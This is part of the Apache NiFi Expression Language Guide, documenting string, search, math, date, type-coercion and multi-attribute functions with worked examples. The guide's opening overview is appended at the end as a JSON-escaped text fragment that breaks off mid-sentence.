Expressions will provide the following results:

.Replace Examples
|===================================================================
| Expression | Value
| `${filename:replace('.', '_')}` | `a brand new filename_txt`
| `${filename:replace(' ', '.')}` | `a.brand.new.filename.txt`
| `${filename:replace('XYZ', 'ZZZ')}` | `a brand new filename.txt`
| `${filename:replace('filename', 'book')}` | `a brand new book.txt`
|===================================================================



[.function]
=== replaceAll

*Description*: [.description]#The `replaceAll` function takes two String arguments: a Regular Expression (NiFi uses the Java Pattern
	syntax), and a replacement string. The return value is the result of substituting the replacement string for
	all patterns within the Subject that match the Regular Expression.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_Regex_# : [.argDesc]#The Regular Expression (in Java syntax) to match in the Subject#
	- [.argName]#_Replacement_# : [.argDesc]#The value to use for replacing matches in the Subject. If the _regular expression_
		argument uses Capturing Groups, back references are allowed in the _replacement_.#

*Return Type*: [.returnType]#String#

*Examples*: If the "filename" attribute has the value "a brand new filename.txt", then the following
Expressions will provide the following results:

.replaceAll Examples
|=======================================================================================
| Expression | Value
| `${filename:replaceAll('\..*', '')}` | `a brand new filename`
| `${filename:replaceAll('a brand (new)', '$1')}` | `new filename.txt`
| `${filename:replaceAll('XYZ', 'ZZZ')}` | `a brand new filename.txt`
| `${filename:replaceAll('brand (new)', 'somewhat $1')}` | `a somewhat new filename.txt`
|=======================================================================================



[.function]
=== replaceNull

*Description*: [.description]#The `replaceNull` function returns the argument if the Subject is null. Otherwise,
	returns the Subject.#

*Subject Type*: [.subject]#Any#

*Arguments*:

	- [.argName]#_Replacement_# : [.argDesc]#The value to return if the Subject is null.#

*Return Type*: [.returnType]#Type of Subject if Subject is not null; else, type of Argument#

*Examples*: If the attribute "filename" has the value "a brand new filename.txt" and the attribute
	"hello" does not exist, then the Expression `${filename:replaceNull('abc')}` will return
	"a brand new filename.txt", while `${hello:replaceNull('abc')}` will return "abc".



[.function]
=== replaceEmpty

*Description*: [.description]#The `replaceEmpty` function returns the argument if the Subject is null or
	if the Subject consists only of white space (new line, carriage return, tab, space). Otherwise,
	returns the Subject.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_Replacement_# : [.argDesc]#The value to return if the Subject is null or empty.#

*Return Type*: [.returnType]#String#

*Examples*: If the attribute "filename" has the value "a brand new filename.txt" and the attribute
	"hello" has the value " ", then the Expression `${filename:replaceEmpty('abc')}` will return
	"a brand new filename.txt", while `${hello:replaceEmpty('abc')}` will return "abc".



[.function]
=== length

*Description*: [.description]#Returns the length of the Subject#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#Number#

*Examples*: If the attribute "filename" has a value of "a brand new filename.txt" and the attribute
	"hello" does not exist, then the Expression `${filename:length()}` will return 24. `${hello:length()}`
	will return 0.
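
`replaceNull` is the idiomatic way to supply a default for an attribute that may be missing. A sketch,
assuming a FlowFile that may or may not carry a `mime.type` attribute (the attribute name and the default
value are illustrative, not part of this guide's standard examples):

-----------------------------------------------
${mime.type:replaceNull('application/octet-stream')}
-----------------------------------------------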

[[searching]]
== Searching

Each of the following functions is used to search its subject for some value.


[.function]
=== startsWith

*Description*: [.description]#Returns `true` if the Subject starts with the String provided as the argument,
	`false` otherwise.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The value to search for#

*Return Type*: [.returnType]#Boolean#

*Examples*: If the "filename" attribute has the value "a brand new filename.txt", then the Expression
	`${filename:startsWith('a brand')}` will return `true`. `${filename:startsWith('A BRAND')}` will
	return `false`. `${filename:toUpper():startsWith('A BRAND')}` returns `true`.



[.function]
=== endsWith

*Description*: [.description]#Returns `true` if the Subject ends with the String provided as the argument,
	`false` otherwise.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The value to search for#

*Return Type*: [.returnType]#Boolean#

*Examples*: If the "filename" attribute has the value "a brand new filename.txt", then the Expression
	`${filename:endsWith('txt')}` will return `true`. `${filename:endsWith('TXT')}` will
	return `false`. `${filename:toUpper():endsWith('TXT')}` returns `true`.



[.function]
=== contains

*Description*: [.description]#Returns `true` if the Subject contains the value of the argument anywhere in the value.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The value to search for#

*Return Type*: [.returnType]#Boolean#

*Examples*: If the "filename" attribute has the value "a brand new filename.txt", then the Expression
	`${filename:contains('new')}` will return `true`. `${filename:contains('NEW')}` will
	return `false`. `${filename:toUpper():contains('NEW')}` returns `true`.

[.function]
=== find

*Description*: [.description]#Returns `true` if the Subject contains any sequence of characters that matches the
	Regular Expression provided by the argument.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_Regex_# : [.argDesc]#The Regular Expression (in the Java Pattern syntax) to match against the Subject#

*Return Type*: [.returnType]#Boolean#

*Examples*:

If the "filename" attribute has the value "a brand new filename.txt", then the following
Expressions will provide the following results:

.find Examples
|=======================================================================================
| Expression | Value
| `${filename:find('a [Bb]rand [Nn]ew')}` | `true`
| `${filename:find('Brand.*')}` | `false`
| `${filename:find('brand')}` | `true`
|=======================================================================================



[.function]
=== matches

*Description*: [.description]#Returns `true` if the Subject exactly matches the Regular Expression provided by the argument.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_Regex_# : [.argDesc]#The Regular Expression (in the Java Pattern syntax) to match against the Subject#

*Return Type*: [.returnType]#Boolean#

*Examples*:

If the "filename" attribute has the value "a brand new filename.txt", then the following
Expressions will provide the following results:

.matches Examples
|=======================================================================================
| Expression | Value
| `${filename:matches('a.*txt')}` | `true`
| `${filename:matches('brand')}` | `false`
| `${filename:matches('.+brand.+')}` | `true`
|=======================================================================================



[.function]
=== indexOf

*Description*: [.description]#Returns the index of the first character in the Subject that matches the String value provided
	as an argument. If the argument is found multiple times within the Subject, the value returned is the
	starting index of the *first* occurrence.
	If the argument cannot be found in the Subject, returns `-1`. The index is zero-based. This means that if
	the search string is found at the beginning of the Subject, the value returned will be `0`, not `1`.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The value to search for in the Subject#

*Return Type*: [.returnType]#Number#

*Examples*: If the "filename" attribute has the value "a brand new filename.txt", then the following
Expressions will provide the following results:

.indexOf Examples
|===============================================
| Expression | Value
| `${filename:indexOf('a.*txt')}` | `-1`
| `${filename:indexOf('.')}` | `20`
| `${filename:indexOf('a')}` | `0`
| `${filename:indexOf(' ')}` | `1`
|===============================================
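
Because any Expression that returns a Number can be embedded as an argument, `indexOf` pairs naturally with
`substring`. The following sketch captures everything before the first period, equivalent to
`${filename:substringBefore('.')}`:

-----------------------------------------------
${filename:substring(0, ${filename:indexOf('.')})}   -> "a brand new filename"
-----------------------------------------------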

[.function]
=== lastIndexOf

*Description*: [.description]#Returns the index of the first character in the Subject that matches the String value provided
	as an argument. If the argument is found multiple times within the Subject, the value returned is the
	starting index of the *last* occurrence.
	If the argument cannot be found in the Subject, returns `-1`. The index is zero-based. This means that if
	the search string is found at the beginning of the Subject, the value returned will be `0`, not `1`.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The value to search for in the Subject#

*Return Type*: [.returnType]#Number#

*Examples*: If the "filename" attribute has the value "a brand new filename.txt", then the following
Expressions will provide the following results:

.lastIndexOf Examples
|=======================================================================================
| Expression | Value
| `${filename:lastIndexOf('a.*txt')}` | `-1`
| `${filename:lastIndexOf('.')}` | `20`
| `${filename:lastIndexOf('a')}` | `17`
| `${filename:lastIndexOf(' ')}` | `11`
|=======================================================================================



[[numbers]]
== Mathematical Operations and Numeric Manipulation


[.function]
=== plus

*Description*: [.description]#Adds a numeric value to the Subject. If either the argument or the Subject cannot be
	coerced into a Number, returns `null`.#

*Subject Type*: [.subject]#Number#

*Arguments*:

	- [.argName]#_Operand_# : [.argDesc]#The value to add to the Subject#

*Return Type*: [.returnType]#Number#

*Examples*: If the "fileSize" attribute has a value of 100, then the Expression `${fileSize:plus(1000)}`
	will return the value `1100`.



[.function]
=== minus

*Description*: [.description]#Subtracts a numeric value from the Subject.#

*Subject Type*: [.subject]#Number#

*Arguments*:

	- [.argName]#_Operand_# : [.argDesc]#The value to subtract from the Subject#

*Return Type*: [.returnType]#Number#

*Examples*: If the "fileSize" attribute has a value of 100, then the Expression `${fileSize:minus(100)}`
	will return the value `0`.



[.function]
=== multiply

*Description*: [.description]#Multiplies a numeric value by the Subject and returns the product.#

*Subject Type*: [.subject]#Number#

*Arguments*:

	- [.argName]#_Operand_# : [.argDesc]#The value to multiply the Subject by#

*Return Type*: [.returnType]#Number#

*Examples*: If the "fileSize" attribute has a value of 100, then the Expression `${fileSize:multiply(1024)}`
	will return the value `102400`.



[.function]
=== divide

*Description*: [.description]#Divides the Subject by a numeric value and returns the result, rounded down to the nearest integer.#

*Subject Type*: [.subject]#Number#

*Arguments*:

	- [.argName]#_Operand_# : [.argDesc]#The value to divide the Subject by#

*Return Type*: [.returnType]#Number#

*Examples*: If the "fileSize" attribute has a value of 100, then the Expression `${fileSize:divide(12)}`
	will return the value `8`.



[.function]
=== mod

*Description*: [.description]#Performs a modular division of the Subject by the argument. That is, this function will divide
	the Subject by the value of the argument and return not the quotient but rather the remainder.#

*Subject Type*: [.subject]#Number#

*Arguments*:

	- [.argName]#_Operand_# : [.argDesc]#The value to divide the Subject by#

*Return Type*: [.returnType]#Number#

*Examples*: If the "fileSize" attribute has a value of 100, then the Expression `${fileSize:mod(12)}`
	will return the value `4`.
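
The arithmetic functions chain like any others, which makes simple unit conversions one-liners. A sketch
using the `fileSize` value of 100 from the examples above (adding 1023 before dividing is the usual trick
for rounding up rather than down):

-----------------------------------------------
${fileSize:divide(1024)}             -> 0
${fileSize:plus(1023):divide(1024)}  -> 1
-----------------------------------------------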

[.function]
=== toRadix

*Description*: [.description]#Converts the Subject from a Base 10 number to a different Radix (or number base). An optional
	second argument can be used to indicate the minimum number of characters to be used. If the converted value
	has fewer than this number of characters, the number will be padded with leading zeroes.#

*Subject Type*: [.subject]#Number#

*Arguments*:

	- [.argName]#_Desired Base_# : [.argDesc]#A Number between 2 and 36 (inclusive)#
	- [.argName]#_Padding_# : [.argDesc]#Optional argument that specifies the minimum number of characters in the converted output#

*Return Type*: [.returnType]#String#

*Examples*: If the "fileSize" attribute has a value of 1024, then the following Expressions will yield
	the following results:

.toRadix Examples
|=======================================================================================
| Expression | Value
| `${fileSize:toRadix(10)}` | `1024`
| `${fileSize:toRadix(10, 1)}` | `1024`
| `${fileSize:toRadix(10, 8)}` | `00001024`
| `${fileSize:toRadix(16)}` | `400`
| `${fileSize:toRadix(16, 8)}` | `00000400`
| `${fileSize:toRadix(2)}` | `10000000000`
| `${fileSize:toRadix(2, 16)}` | `0000010000000000`
|=======================================================================================



[[dates]]
== Date Manipulation


[[format]]
[.function]
=== format

*Description*: [.description]#Formats a number as a date/time according to the format specified by the argument. The argument
	must be a String that is a valid Java SimpleDateFormat format. The Subject is expected to be a Number that
	represents the number of milliseconds since Midnight GMT January 1, 1970.#

*Subject Type*: [.subject]#Number#

*Arguments*:

	- [.argName]#_format_# : [.argDesc]#The format to use in the Java SimpleDateFormat syntax#

*Return Type*: [.returnType]#String#

*Examples*: If the attribute "time" has the value "1420058163264", then the following Expressions will yield
	the following results:

.format Examples
|============================================================================
| Expression | Value
| `${time:format("yyyy/MM/dd HH:mm:ss.SSS'Z'")}` | `2014/12/31 15:36:03.264Z`
| `${time:format("yyyy/MM/dd")}` | `2014/12/31`
| `${time:format("HH:mm:ss.SSS'Z'")}` | `15:36:03.264Z`
| `${time:format("2014")}` | `2014`
|============================================================================

[.function]
=== toDate

*Description*: [.description]#Converts a String into a Number, based on the format specified by the argument. The argument
	must be a String in the valid Java SimpleDateFormat syntax. The Subject is expected to be a String
	that is formatted according to the argument. The return value is the number of milliseconds since
	Midnight GMT January 1, 1970.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_format_# : [.argDesc]#The current format to use when parsing the Subject, in the Java SimpleDateFormat syntax.#

*Return Type*: [.returnType]#Number#

*Examples*: If the attribute "year" has the value "2014" and the attribute "time" has the value "2014/12/31 15:36:03.264Z",
	then the Expression `${year:toDate('yyyy')}` will return the number of milliseconds between Midnight GMT on January 1, 1970
	and Midnight GMT on January 1, 2014. The Expression `${time:toDate("yyyy/MM/dd HH:mm:ss.SSS'Z'")}` will result in the
	number of milliseconds between Midnight GMT on January 1, 1970 and 15:36:03.264 GMT on December 31, 2014.

	Often, this function is used in conjunction with the <<format>> function to change the format of a date/time. For example,
	if the attribute "date" has the value "12-24-2014" and we want to change the format to "2014/12/24", we can do so by
	chaining together the two functions: `${date:toDate('MM-dd-yyyy'):format('yyyy/MM/dd')}`.



[.function]
=== now

*Description*: [.description]#The `now` function returns the current date and time as the number of milliseconds since Midnight GMT on
	January 1, 1970.#

*Subject Type*: [.subject]#No Subject#

*Arguments*: No arguments

*Return Type*: [.returnType]#Number#

*Examples*: We can format the current date and time by using the `now` function in conjunction with the <<format>> function:
	`${now():format('yyyy/MM/dd HH:mm:ss')}`.
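
Because dates and times are simply Numbers, the arithmetic functions described above apply to them
directly. A sketch that renders ``24 hours ago'' as a human-readable timestamp (86400000 is the number of
milliseconds in one day):

-----------------------------------------------
${now():minus(86400000):format('yyyy/MM/dd HH:mm:ss')}
-----------------------------------------------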

[[type_cast]]
== Type Coercion

[.function]
=== toString

*Description*: [.description]#Coerces the Subject into a String#

*Subject Type*: [.subject]#Any type#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: The Expression `${fileSize:toNumber():toString()}` converts the value of the "fileSize" attribute to a number and
	back to a String.



[.function]
=== toNumber

*Description*: [.description]#Coerces the Subject into a Number#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#Number#

*Examples*: The Expression `${fileSize:toNumber()}` converts the String attribute value of "fileSize" to a number.



[[subjectless]]
== Subjectless Functions

While the majority of functions in the Expression Language are called by using the syntax
`${attributeName:function()}`, there exist a few functions that are not expected to have subjects.
In this case, the attribute name is not present. For example, the IP address of the machine can
be obtained by using the Expression `${ip()}`. All of the functions in this section are to be called
without a subject. Attempting to call a subjectless function and provide it a subject will result in
an error when validating the function.


[.function]
=== ip

*Description*: [.description]#Returns the IP address of the machine.#

*Subject Type*: [.subjectless]#No subject#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: The IP address of the machine can be obtained by using the Expression `${ip()}`.



[.function]
=== hostname

*Description*: [.description]#Returns the Hostname of the machine. An optional argument of type Boolean can be provided
	to specify whether or not the Fully Qualified Domain Name should be used. If `false`, or not specified,
	the hostname will not be fully qualified. If the argument is `true` but the fully qualified hostname
	cannot be resolved, the simple hostname will be returned.#

*Subject Type*: [.subjectless]#No subject#

*Arguments*:

	- [.argName]#_Fully Qualified_# : [.argDesc]#Optional parameter that specifies whether or not the hostname should be
		fully qualified. If not specified, defaults to false.#

*Return Type*: [.returnType]#String#

*Examples*: The fully qualified hostname of the machine can be obtained by using the Expression `${hostname(true)}`,
	while the simple hostname can be obtained by using either `${hostname(false)}` or simply `${hostname()}`.



[.function]
=== UUID

*Description*: [.description]#Returns a randomly generated UUID.#

*Subject Type*: [.subjectless]#No Subject#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: `${UUID()}` returns a value similar to `de305d54-75b4-431b-adb2-eb6b9e546013`.



[.function]
=== nextInt

*Description*: [.description]#Returns a one-up value (starting at 0) and increasing over the lifetime of the running instance of NiFi.
	This value is not persisted across restarts and is not guaranteed to be unique across a cluster.
	This value is considered "one-up" in that if called multiple times across the NiFi instance, the values will be sequential.
	However, this counter is shared across all NiFi components, so calling this function multiple times from one Processor will
	not guarantee sequential values within the context of a particular Processor.#

*Subject Type*: [.subjectless]#No Subject#

*Arguments*: No arguments

*Return Type*: [.returnType]#Number#

*Examples*: If the previous value returned by `nextInt` was `5`, the Expression `${nextInt():divide(2)}` obtains the next available
	integer (6) and divides the result by 2, returning a value of `3`.



[[multi]]
== Evaluating Multiple Attributes

When it becomes necessary to evaluate the same conditions against multiple attributes, this can be accomplished by means of the
`and` and `or` functions. However, this quickly becomes tedious, error-prone, and difficult to maintain. For this reason, NiFi
provides several functions for evaluating the same conditions against groups of attributes at the same time.
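
To see why these functions earn their keep, compare a hand-built check against two attributes with the
equivalent `anyAttribute` call (described next); both sketches are `true` if either attribute contains
``world'':

-----------------------------------------------
${abc:contains('world'):or( ${xyz:contains('world')} )}

${anyAttribute("abc", "xyz"):contains("world")}
-----------------------------------------------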

[.function]
=== anyAttribute

*Description*: [.description]#Checks to see if any of the given attributes match the given condition. This function has no subject and takes one or more
	arguments that are the names of attributes to which the remainder of the Expression is to be applied. If any of the attributes specified,
	when evaluated against the rest of the Expression, returns a value of `true`, then this function will return `true`. Otherwise, this function
	will return `false`.#

*Subject Type*: [.subjectless]#No Subject#

*Arguments*:

	- [.argName]#_Attribute Names_# : [.argDesc]#One or more attribute names to evaluate#

*Return Type*: [.returnType]#Boolean#

*Examples*: Given that the "abc" attribute contains the value "hello world", "xyz" contains "good bye world",
	and "filename" contains "file.txt" consider the following examples:

.anyAttribute Examples
|=======================================================================
| Expression | Value
| `${anyAttribute("abc", "xyz"):contains("bye")}` | `true`
| `${anyAttribute("filename","xyz"):toUpper():contains("e")}` | `false`
|=======================================================================



[.function]
=== allAttributes

*Description*: [.description]#Checks to see if all of the given attributes match the given condition. This function has no subject and takes one or more
	arguments that are the names of attributes to which the remainder of the Expression is to be applied. If all of the attributes specified,
	when evaluated against the rest of the Expression, return a value of `true`, then this function will return `true`. Otherwise, this function
	will return `false`.#

*Subject Type*: [.subjectless]#No Subject#

*Arguments*:

	- [.argName]#_Attribute Names_# : [.argDesc]#One or more attribute names to evaluate#

*Return Type*: [.returnType]#Boolean#

*Examples*: Given that the "abc" attribute contains the value "hello world", "xyz" contains "good bye world",
	and "filename" contains "file.txt" consider the following examples:

.allAttributes Examples
|=============================================================================
| Expression | Value
| `${allAttributes("abc", "xyz"):contains("world")}` | `true`
| `${allAttributes("abc", "filename","xyz"):toUpper():contains("e")}` | `false`
|=============================================================================



[.function]
=== anyMatchingAttribute

*Description*: [.description]#Checks to see if any of the attributes whose names match the given Regular Expressions satisfy the given condition.
	This function has no subject and takes one or more arguments that are Regular Expressions to match against attribute names.
	Any attribute whose name matches one of the supplied Regular Expressions will be evaluated against the rest of the Expression.
	If any of those attributes, when evaluated against the rest of the Expression, returns a value of `true`, then this function
	will return `true`. Otherwise, this function will return `false`.#

*Subject Type*: [.subjectless]#No Subject#

*Arguments*:

	- [.argName]#_Regex_# : [.argDesc]#One or more Regular Expressions (in the Java Pattern syntax) to evaluate against attribute names#

*Return Type*: [.returnType]#Boolean#

*Examples*: Given that the "abc" attribute contains the value "hello world", "xyz" contains "good bye world",
	and "filename" contains "file.txt" consider the following examples:

.anyMatchingAttribute Examples
|==============================================================
| Expression | Value
| `${anyMatchingAttribute("[ax].*"):contains('bye')}` | `true`
| `${anyMatchingAttribute(".*"):isNull()}` | `false`
|==============================================================

[.function]
=== allMatchingAttributes

*Description*: [.description]#Checks to see if all of the attributes whose names match the given Regular Expressions satisfy the given condition.
	This function has no subject and takes one or more arguments that are Regular Expressions to match against attribute names.
	Any attribute whose name matches one of the supplied Regular Expressions will be evaluated against the rest of the Expression.
	If all of those attributes, when evaluated against the rest of the Expression, return a value of `true`, then this function
	will return `true`. Otherwise, this function will return `false`.#

*Subject Type*: [.subjectless]#No Subject#

*Arguments*:

	- [.argName]#_Regex_# : [.argDesc]#One or more Regular Expressions (in the Java Pattern syntax) to evaluate against attribute names#

*Return Type*: [.returnType]#Boolean#

*Examples*: Given that the "abc" attribute contains the value "hello world", "xyz" contains "good bye world",
	and "filename" contains "file.txt" consider the following examples:

.allMatchingAttributes Examples
|==============================================================
| Expression | Value
| `${allMatchingAttributes("[ax].*"):contains("world")}` | `true`
| `${allMatchingAttributes(".*"):isNull()}` | `false`
| `${allMatchingAttributes("f.*"):count()}` | `1`
|==============================================================



[.function]
=== anyDelineatedValue

*Description*: [.description]#Splits a String apart according to a delimiter that is provided, and then evaluates each of the values against
	the rest of the Expression. If the Expression, when evaluated against any of the individual values, returns `true`, this
	function returns `true`. Otherwise, the function returns `false`.#

*Subject Type*: [.subjectless]#No Subject#

*Arguments*:

	- [.argName]#_Delineated Value_# : [.argDesc]#The value that is delineated. This is generally an embedded Expression,
		though it does not have to be.#
	- [.argName]#_Delimiter_# : [.argDesc]#The value to use to split apart the _Delineated Value_ argument.#

*Return Type*: [.returnType]#Boolean#

*Examples*: Given that the "number_list" attribute contains the value "1,2,3,4,5", and the "word_list" attribute contains the value "the,and,or,not",
	consider the following examples:

.anyDelineatedValue Examples
|===============================================================================
| Expression | Value
| `${anyDelineatedValue("${number_list}", ","):contains("5")}` | `true`
| `${anyDelineatedValue("this that and", ","):equals("${word_list}")}` | `false`
|===============================================================================
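
A typical use of `anyDelineatedValue` is testing membership in a list carried by another attribute. A
sketch, assuming hypothetical `allowed_users` (a comma-separated list of names) and `username` attributes:

-----------------------------------------------
${anyDelineatedValue("${allowed_users}", ","):equals( ${username} )}
-----------------------------------------------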

[.function]
=== allDelineatedValues

*Description*: [.description]#Splits a String apart according to a delimiter that is provided, and then evaluates each of the values against
	the rest of the Expression. If the Expression, when evaluated against all of the individual values, returns `true` in each
	case, then this function returns `true`. Otherwise, the function returns `false`.#

*Subject Type*: [.subjectless]#No Subject#

*Arguments*:

	- [.argName]#_Delineated Value_# : [.argDesc]#The value that is delineated. This is generally an embedded Expression,
		though it does not have to be.#
	- [.argName]#_Delimiter_# : [.argDesc]#The value to use to split apart the _Delineated Value_ argument.#

*Return Type*: [.returnType]#Boolean#

*Examples*: Given that the "number_list" attribute contains the value "1,2,3,4,5", and the "word_list" attribute contains the value "those,known,or,not",
	consider the following examples:

.allDelineatedValues Examples
|===============================================================================
| Expression | Value
| `${allDelineatedValues("${word_list}", ","):contains("o")}` | `true`
| `${allDelineatedValues("${number_list}", ","):count()}` | `5`
| `${allDelineatedValues("${number_list}", ","):matches("[0-9]+")}` | `true`
| `${allDelineatedValues("${word_list}", ","):matches('e')}` | `false`
|===============================================================================



[.function]
=== join

*Description*: [.description]#Aggregate function that concatenates multiple values with the specified delimiter. This function
	may be used only in conjunction with the `allAttributes`, `allMatchingAttributes`, and `allDelineatedValues`
	functions.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_Delimiter_# : [.argDesc]#The String delimiter to use when joining values#

*Return Type*: [.returnType]#String#

*Examples*: Given that the "abc" attribute contains the value "hello world", "xyz" contains "good bye world",
	and "filename" contains "file.txt" consider the following examples:

.join Examples
|=======================================================================================
| Expression | Value
| `${allMatchingAttributes("[ax].*"):substringBefore(" "):join("-")}` | `hello-good`
| `${allAttributes("abc", "xyz"):join(" now")}` | `hello world nowgood bye world now`
|=======================================================================================



[.function]
=== count

*Description*: [.description]#Aggregate function that counts the number of non-null, non-false values returned by the
	`allAttributes`, `allMatchingAttributes`, and `allDelineatedValues` functions. This function
	may be used only in conjunction with the `allAttributes`, `allMatchingAttributes`, and `allDelineatedValues`
	functions.#

*Subject Type*: [.subject]#Any#

*Arguments*: No arguments

*Return Type*: [.returnType]#Number#

*Examples*: Given that the "abc" attribute contains the value "hello world", "xyz" contains "good bye world",
	and "number_list" contains "1,2,3,4,5" consider the following examples:

.count Examples
|===========================================================================
| Expression | Value
| `${allMatchingAttributes("[ax].*"):substringBefore(" "):count()}` | `2`
| `${allAttributes("abc", "xyz"):contains("world"):count()}` | `2`
| `${allDelineatedValues(${number_list}, ","):count()}` | `5`
| `${allAttributes("abc", "non-existent-attr", "xyz"):count()}` | `2`
| `${allMatchingAttributes(".*"):length():gt(10):count()}` | `2`
|===========================================================================
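
As a closing sketch, the aggregate functions compose with the per-value functions that precede them:
assuming the "word_list" attribute again holds "the,and,or,not", the following counts how many of its
entries are non-empty:

-----------------------------------------------
${allDelineatedValues("${word_list}", ","):isEmpty():not():count()}   -> 4
-----------------------------------------------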
See the NOTICE file distributed with\n\/\/ this work for additional information regarding copyright ownership.\n\/\/ The ASF licenses this file to You under the Apache License, Version 2.0\n\/\/ (the \"License\"); you may not use this file except in compliance with\n\/\/ the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\/\/\nApache NiFi Expression Language Guide\n=====================================\nApache NiFi Team <dev@nifi.incubator.apache.org>\n:homepage: http:\/\/nifi.incubator.apache.org\n\n[[overview]]\nOverview\n--------\nAll data in Apache NiFi is represented by an abstraction called a FlowFile.\nA FlowFile is comprised of two major pieces: content and attributes.\nThe content portion of the FlowFile represents the data on which to operate.\nFor instance, if a file is picked up from a local file system using the\nGetFile Processor, the contents of the file will become the contents of the \nFlowFile.\n\nThe attributes portion of the FlowFile represents information about the data\nitself, or metadata. Attributes are key-value pairs that represent what is\nknown about the data as well as information that is useful for routing and\nprocessing the data appropriately.\nKeeping with the example of a file that is picked up from\na local file system, the FlowFile would have an attribute called `filename` that\nreflected the name of the file on the file system. Additionally, the FlowFile will\nhave a `path` attribute that reflects the directory on the file system that this\nfile lived in. The FlowFile will also have an attribute named `uuid`, which is a\nunique identifier for this FlowFile.\n\nHowever, placing these attributes on a FlowFile do not provide much benefit\nif the user is unable to make use of them. The NiFi Expression Language provides\nthe ability to reference these attributes, compare them to other values,\nand manipulate their values.\n\n\n[[structure]]\nStructure of a NiFi Expression\n------------------------------\n\nThe NiFi Expression Language always begins with the start delimiter `${` and ends\nwith the end delimiter `}`. Between the start and end delimiters is the text of the\nExpression itself. In its most basic form, the Expression can consist of just an\nattribute name. For example, `${filename}` will return the value of the ``filename''\nattribute.\n\nIn a slightly more complex example, we can instead return a manipulation of this value.\nWe can, for example, return an all upper-case version of the filename by calling the\n`toUpper` function: `${filename:toUpper()}`. In this case, we reference the ``filename''\nattribute and then manipulate this value by using the `toUpper` function. A function call\nconsists of 5 elements. First, there is a function call delimiter `:`. Second is the name\nof the function - in this case, ``toUpper''. Next is an open parenthesis (`(`), followed\nby the function arguments. The arguments necessary are dependent upon which function\nis being called. In this example, we are using the `toUpper` function, which does not\nhave any arguments, so this element is omitted. 
Finally, the closing parenthesis (`)`)\nindicates the end of the function call. There are many different functions that are supported\nby the Expression Language to achieve many different goals. Some functions provide String (text)\nmanipulation, such as the `toUpper` function. Others, such as the `equals` and `matches` functions,\nprovide comparison functionality. Functions also exist for manipulating dates and times and\nfor performing mathematical operations. Each of these functions is described below, in the\n<<functions>> section, with an explanation of what the function does, the arguments that it \nrequires, and the type of information that it returns.\n\nWhen we perform a function call on an attribute, as above, we refer to the attribute as the\n_subject_ of the function, as the attribute is the entity on which the function is operating.\nWe can then chain together multiple function calls, where the return value of the first function\nbecomes the subject of the second function and its return value becomes the subject of the third\nfunction and so on. Continuing with our example, we can chain together multiple functions by using\nthe expression `${filename:toUpper():equals('HELLO.TXT')}`. There is no limit to the number of\nfunctions that can be chained together.\n\nAny FlowFile attribute can be referenced using the Expression Language. However, if the attribute\nname contains a ``special character,'' the attribute name must be escaped by quoting it. The following\ncharacters are each considered ``special characters'':\n\n- $ (dollar sign)\n- | (pipe)\n- { (open brace)\n- } (close brace)\n- ( (open parenthesis)\n- ) (close parenthesis)\n- [ (open bracket)\n- ] (close bracket)\n- , (comma)\n- : (colon)\n- ; (semicolon)\n- \/ (forward slash)\n- * (asterisk)\n- ' (single quote)\n- (space)\n- \\t (tab)\n- \\r (carriage return)\n- \\n (new-line)\n\nAdditionally, a number is considered a ``special character'' if it is the first character of the attribute name.\nIf any of these special characters is present in an attribute name, the attribute name must be quoted by using either single or double quotes.\nThe Expression Language allows single quotes and double quotes to be used interchangeably. For example, the following\ncan be used to escape an attribute named ``my attribute'': `${\"my attribute\"}` or `${'my attribute'}`.\n\nIn this example, the value to be returned is the value of the \"my attribute\" attribute, if it exists. If that attribute\ndoes not exist, the Expression Language will then look for a System Environment Variable named \"my attribute.\" If\nunable to find this, it will look for a JVM System Property named \"my attribute.\" Finally, if none of these exists,\nthe Expression Language will return a `null` value.\n\nThere also exist some functions that expect to have no subject. These functions are invoked simply\nby calling the function at the beginning of the Expression, such as `${hostname()}`. These functions\ncan then be chained together, as well. For example, `${hostname():toUpper()}`. Attempting to \nevaluate the function with a subject will result in an error. In the <<functions>>\nsection below, these functions will clearly indicate in their descriptions that they do not\nrequire a subject.\n\nOftentimes, we will need to compare the values of two different attributes to each other. \nWe are able to accomplish this by using embedded Expressions. 
We can, for example, check if\nthe ``filename'' attribute is the same as the ``uuid'' attribute: `${filename:equals( ${uuid} )}`.\nNotice here, also, that we have a space between the opening parenthesis for the `equals` method and\nthe embedded Expression. This is not necessary and does not affect how the Expression is evaluated\nin any way. Rather, it is intended to make the Expression easier to read. White space is ignored by\nthe Expression Language between delimiters. Therefore, we can use the Expression\n`${ filename : equals(${ uuid}) }` or `${filename:equals(${uuid})}` and both Expressions\nmean the same thing. We cannot, however, use `${file name:equals(${uuid})}`, because this results\nin `file` and `name` being interpreted as different tokens, rather than a single token, `filename`.\n\n\n\n[[usage]]\n== Expression Language in the Application\n\nThe Expression Language is used heavily throughout the NiFi application for configuring Processor\nproperties. Not all Processor properties support the Expression Language, however. Whether or not\na Property supports the Expression Language is determined by the developer of the Processor when\nthe Processor is written. However, the application strives to clearly illustrate for each Property\nwhether or not the Expression Language is supported.\n\nIn the application, when configuring a Processor property, the User Interface provides an 